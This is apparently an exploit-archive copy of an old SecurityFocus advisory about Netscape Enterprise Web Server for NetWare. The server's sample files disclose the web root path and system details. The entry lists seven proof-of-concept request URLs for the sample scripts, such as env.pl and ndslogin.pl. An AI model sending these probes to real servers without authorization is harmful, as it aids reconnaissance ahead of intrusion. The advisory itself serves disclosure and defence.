21 lines
No EOL
909 B
Text
21 lines
No EOL
909 B
Text
source: https://www.securityfocus.com/bid/4874/info
|
|
|
|
It has been reported that Netscape Enterprise Web Server may disclose path and system information to a remote user.
|
|
|
|
Netscape Enterprise Web Server for Netware contain several sample files which leak system information, this information can be obtained by remote users.
|
|
|
|
An attacker is able to send a request, for an affected sample file, that will cause the host to disclose the location of the web root path. Certain sample files will also reveal detailed system specific information.
|
|
|
|
http://webserver/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/test.jse
|
|
|
|
http://webserver/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse
|
|
|
|
http://webserver/perl/samples/env.pl
|
|
|
|
http://webserver/perl/samples/lancgi.pl
|
|
|
|
http://webserver/perl/samples/volscgi.pl
|
|
|
|
http://webserver/perl/samples/ndslogin.pl
|
|
|
|
http://webserver/netbasic/websinfo.bas |